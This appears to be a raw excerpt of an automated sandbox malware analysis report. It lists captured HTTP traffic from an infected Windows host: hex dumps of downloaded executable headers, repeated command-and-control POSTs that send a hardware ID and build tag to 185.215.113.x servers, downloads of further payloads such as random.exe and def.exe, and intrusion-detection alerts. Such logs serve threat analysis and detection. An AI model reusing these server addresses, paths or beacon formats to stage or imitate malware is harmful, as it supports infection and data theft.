Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:55 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 23 Oct 2024 15:37:20 GMTConnection: keep-aliveETag: "67191830-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 5c be 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 36 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6f 69 6f 79 7a 67 74 00 50 1a 00 00 f0 31 00 00 48 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 61 63 6a 64 71 69 75 00 10 00 00 00 40 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:57 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:52:59 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Wed, 23 Oct 2024 15:44:06 GMTConnection: keep-aliveETag: "671919c6-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 de 72 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 73 64 6a 77 61 6c 69 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 72 6e 6d 63 78 63 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="build"doma------IIJEBAECGCBKECAAAEBF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 39 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000992001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 39 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000993001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build"doma------EBAEBFIIECBGCBGDHCAF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 39 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000994001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="build"doma------BAAFBFBAAKECFIEBFIEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 39 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000995001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="build"doma------JJJKFBAAAFHJEBFIEGID--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="build"doma------AFHDBGHJKFIDHJJJEBKE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="build"doma------DHJKJKKKJJJKJKFHJJJJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"doma------DAECFIJDAAAKECBFCGHI--
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49763 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49868 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49900 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49932 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49961 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49961 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50085 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 12_2_00FDCE44
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1
    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1
